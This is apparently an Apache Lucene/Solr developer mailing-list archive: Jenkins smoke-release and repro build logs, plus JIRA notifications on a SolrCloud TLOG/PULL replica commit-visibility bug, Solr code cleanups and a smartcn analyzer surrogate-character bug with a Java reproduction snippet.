: -ensure-solr-tgz-exists:
: [mkdir] Created dir: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
: [untar] Expanding: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/solr-8.0.0.tgz
 into 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
: 
: generate-maven-artifacts:
: 
: resolve:
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483433#comment-16483433
 ] 

Nguyen Nguyen commented on SOLR-12382:
--

Thanks everyone!!

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On a collection with TLOG/PULL replicas, queries issued right after 
> commit(waitSearcher=true) would NOT return newly added data until several 
> seconds later.
> Tested the same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (the query returned newly added data right after 
> commit(waitSearcher=true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>






[jira] [Updated] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12366:

Attachment: SOLR-12366.patch

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and it's getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12337) Remove QueryWrapperFilter

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12337?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12337:

Attachment: SOLR-12337.patch

> Remove QueryWrapperFilter
> -
>
> Key: SOLR-12337
> URL: https://issues.apache.org/jira/browse/SOLR-12337
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12337.patch, SOLR-12337.patch
>
>
> QueryWrapperFilter has not been needed ever since Filter was changed to 
> extend Query -- LUCENE-1518.  It was retained because there was at least one 
> place in Lucene that had a Filter/Query distinction, but it was forgotten 
> when Filter moved to Solr.  It contains some code that creates a temporary 
> IndexSearcher but forgets to null out the cache on it, and so 
> QueryWrapperFilter can add non-trivial overhead.  We should simply remove it 
> altogether.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still Failing

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-master/1029/

No tests ran.

Build Log:
[...truncated 24174 lines...]
[asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
[asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
 [java] Processed 2212 links (1766 relative) to 3083 anchors in 245 files
 [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr-ref-guide/bare-bones-html/

-dist-changes:
 [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/changes

-dist-keys:
  [get] Getting: http://home.apache.org/keys/group/lucene.asc
  [get] To: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/KEYS

package:

-unpack-solr-tgz:

-ensure-solr-tgz-exists:
[mkdir] Created dir: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
[untar] Expanding: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/solr-8.0.0.tgz
 into 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked

generate-maven-artifacts:

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml


[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Cao Manh Dat (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483416#comment-16483416
 ] 

Cao Manh Dat commented on SOLR-12382:
-

bq. Right, I believe that is the idea - they catch up when they end up polling. 
So I assume this is all by design. Would be nice to at least optionally get the 
behavior of waiting until replicas are up to date before returning from a commit 
w/ waitSearcher=true.
(y) Totally correct, nothing more needs to be explained here.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8325?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

chengpohi updated LUCENE-8325:
--
Description: 
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char. Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

The above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a *PATCH* to try to fix this; please help review (since 
*smartcn* only supports *GBK* chars, the patch just handles the surrogate pair 
as a *single char*).

  was:
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char. Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

The above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a **PATCH** to try to fix this.


> smartcn analyzer can't handle SURROGATE char
> 
>
> Key: LUCENE-8325
> URL: https://issues.apache.org/jira/browse/LUCENE-8325
> Project: Lucene - Core
>  Issue Type: Bug
>Reporter: chengpohi
>Priority: Minor
>  Labels: newbie, patch
> Attachments: handle-surrogate-char-for-smartcn.patch
>
>
> This issue is from [https://github.com/elastic/elasticsearch/issues/30739]
> smartcn analyzer can't handle SURROGATE char. Example:
>  
>  
> {code:java}
> Analyzer ca = new SmartChineseAnalyzer(); 
> String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
> TokenStream tokenStream = ca.tokenStream("", sentence); 
> CharTermAttribute charTermAttribute = 
> tokenStream.addAttribute(CharTermAttribute.class); 
> tokenStream.reset(); 
> while (tokenStream.incrementToken()) { 
> String term = charTermAttribute.toString(); 
> System.out.println(term); 
> } 
> {code}
>  
> The above code snippet will output: 
>  
> {code:java}
> ? 
> ? 
> {code}
>  
>  and I have created a *PATCH* to try to fix this; please help review (since 
> *smartcn* only supports *GBK* chars, the patch just handles the surrogate 
> pair as a *single char*).



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org
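
For background on the failure mode (an editor's sketch, JDK-only, independent of 
smartcn and the attached patch): Java strings are UTF-16, so U+28A0F is two char 
code units but a single code point, and a tokenizer that classifies input 
char-by-char sees two unpaired surrogates:

```java
public class SurrogateDemo {
    public static void main(String[] args) {
        String sentence = "\uD862\uDE0F"; // U+28A0F, the character from the report

        // Two UTF-16 code units...
        System.out.println(sentence.length()); // 2
        // ...but a single Unicode code point.
        System.out.println(sentence.codePointCount(0, sentence.length())); // 1

        // codePointAt() recombines the high/low surrogate pair.
        System.out.println(Integer.toHexString(sentence.codePointAt(0))); // 28a0f

        // Iterating char-by-char (as a BMP/GBK-oriented tokenizer would)
        // yields two lone surrogates, neither a printable character on its own.
        for (char c : sentence.toCharArray()) {
            System.out.println(Character.isSurrogate(c)); // true (twice)
        }
    }
}
```

Whatever form the fix takes, correct iteration has to advance by 
Character.charCount(codePoint) rather than by one char when it meets a high 
surrogate.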



[jira] [Updated] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)

 [ 
https://issues.apache.org/jira/browse/LUCENE-8325?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

chengpohi updated LUCENE-8325:
--
Description: 
This issue is from [https://github.com/elastic/elasticsearch/issues/30739]

smartcn analyzer can't handle SURROGATE char. Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

The above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 and I have created a **PATCH** to try to fix this.

  was:
This issue is from [smartcn_tokenizer 
...](https://github.com/elastic/elasticsearch/issues/30739)

smartcn analyzer can't handle SURROGATE char. Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

The above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 


> smartcn analyzer can't handle SURROGATE char
> 
>
> Key: LUCENE-8325
> URL: https://issues.apache.org/jira/browse/LUCENE-8325
> Project: Lucene - Core
>  Issue Type: Bug
>Reporter: chengpohi
>Priority: Minor
>  Labels: newbie, patch
> Attachments: handle-surrogate-char-for-smartcn.patch
>
>
> This issue is from [https://github.com/elastic/elasticsearch/issues/30739]
> smartcn analyzer can't handle SURROGATE char. Example:
>  
>  
> {code:java}
> Analyzer ca = new SmartChineseAnalyzer(); 
> String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
> TokenStream tokenStream = ca.tokenStream("", sentence); 
> CharTermAttribute charTermAttribute = 
> tokenStream.addAttribute(CharTermAttribute.class); 
> tokenStream.reset(); 
> while (tokenStream.incrementToken()) { 
> String term = charTermAttribute.toString(); 
> System.out.println(term); 
> } 
> {code}
>  
> The above code snippet will output: 
>  
> {code:java}
> ? 
> ? 
> {code}
>  
>  and I have created a **PATCH** to try to fix this.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (LUCENE-8325) smartcn analyzer can't handle SURROGATE char

2018-05-21 Thread chengpohi (JIRA)
chengpohi created LUCENE-8325:
-

 Summary: smartcn analyzer can't handle SURROGATE char
 Key: LUCENE-8325
 URL: https://issues.apache.org/jira/browse/LUCENE-8325
 Project: Lucene - Core
  Issue Type: Bug
Reporter: chengpohi
 Attachments: handle-surrogate-char-for-smartcn.patch

This issue is from [smartcn_tokenizer 
...](https://github.com/elastic/elasticsearch/issues/30739)

smartcn analyzer can't handle SURROGATE char. Example:

 

 
{code:java}
Analyzer ca = new SmartChineseAnalyzer(); 
String sentence = "\uD862\uDE0F"; // 𨨏 a surrogate char 
TokenStream tokenStream = ca.tokenStream("", sentence); 
CharTermAttribute charTermAttribute = 
tokenStream.addAttribute(CharTermAttribute.class); 
tokenStream.reset(); 
while (tokenStream.incrementToken()) { 
String term = charTermAttribute.toString(); 
System.out.println(term); 
} 
{code}
 

The above code snippet will output: 

 
{code:java}
? 
? 
{code}
 

 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-repro - Build # 675 - Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-repro/675/

[...truncated 39 lines...]
[repro] Jenkins log URL: 
https://builds.apache.org/job/Lucene-Solr-Tests-master/2539/consoleText

[repro] Revision: 93926e9c83a9b4e9d52182654befae9d56191911

[repro] Repro line:  ant test  -Dtestcase=NodeAddedTriggerTest 
-Dtests.method=testRestoreState -Dtests.seed=860FB951B6B7BD4C 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.locale=vi-VN 
-Dtests.timezone=Antarctica/McMurdo -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=SoftAutoCommitTest 
-Dtests.method=testSoftCommitWithinAndHardCommitMaxTimeMixedAdds 
-Dtests.seed=860FB951B6B7BD4C -Dtests.multiplier=2 -Dtests.slow=true 
-Dtests.locale=lt-LT -Dtests.timezone=America/Managua -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] Repro line:  ant test  -Dtestcase=IndexSizeTriggerTest 
-Dtests.method=testMergeIntegration -Dtests.seed=860FB951B6B7BD4C 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.locale=es-AR 
-Dtests.timezone=America/Indiana/Petersburg -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
0bf1eae92c4117659e2608111a8d64294009cc98
[repro] git fetch

[...truncated 2 lines...]
[repro] git checkout 93926e9c83a9b4e9d52182654befae9d56191911

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   IndexSizeTriggerTest
[repro]   SoftAutoCommitTest
[repro]   NodeAddedTriggerTest
[repro] ant compile-test

[...truncated 3298 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=15 
-Dtests.class="*.IndexSizeTriggerTest|*.SoftAutoCommitTest|*.NodeAddedTriggerTest"
 -Dtests.showOutput=onerror  -Dtests.seed=860FB951B6B7BD4C -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.locale=es-AR 
-Dtests.timezone=America/Indiana/Petersburg -Dtests.asserts=true 
-Dtests.file.encoding=UTF-8

[...truncated 4355 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: org.apache.solr.update.SoftAutoCommitTest
[repro]   2/5 failed: org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest
[repro]   3/5 failed: org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest
[repro] git checkout 0bf1eae92c4117659e2608111a8d64294009cc98

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 6 lines...]

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483203#comment-16483203
 ] 

Mark Miller commented on SOLR-12382:


Right, I believe that is the idea - they catch up when they end up polling. So 
I assume this is all by design. Would be nice to at least optionally get the 
behavior of waiting until replicas are up to date before returning from a commit 
w/ waitSearcher=true.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483190#comment-16483190
 ] 

Shawn Heisey commented on SOLR-12382:
-

There is another possibility.  If this is how TLOG/PULL work, then it would 
happen even if your commits are hard commits.  Perhaps somebody who's familiar 
with the implementation can say whether this is possible.

If replication to TLOG and PULL replicas happens on a polling interval (like 
master/slave for non-cloud setups) rather than being triggered on every index 
change, then the other replicas would not see changes immediately.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483191#comment-16483191
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit 0bf1eae92c4117659e2608111a8d64294009cc98 in lucene-solr's branch 
refs/heads/master from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=0bf1eae ]

SOLR-9480 followup: remove/abstract deprecated implementations on master


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483188#comment-16483188
 ] 

Mark Miller commented on SOLR-12382:


Whoever added the feature will be able to comment better, but from what I have 
seen, non-leader replicas skip any commit in tlog mode - and only in tests, 
rather than just returning on commit, there is an assert that tries to wait 
until the replica appears to be in sync with the leader.

Pull replicas also seem to just skip any commit on replicas and log a warning - 
they don't have the test wait code. In both cases, I don't see how 
waitSearcher=true would affect anything on the replica side unless somehow it's 
handled in some strange other place. AFAICT it would only wait for the leader 
to open the new searcher.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called).
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings:
> <autoCommit>
>   <maxTime>15000</maxTime>
>   <openSearcher>false</openSearcher>
> </autoCommit>
> <autoSoftCommit>
>   <maxTime>-1</maxTime>
> </autoSoftCommit>



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483184#comment-16483184
 ] 

Shawn Heisey edited comment on SOLR-12382 at 5/21/18 11:10 PM:
---

We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas, because TLOG and PULL replicas copy the 
on-disk index.
 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
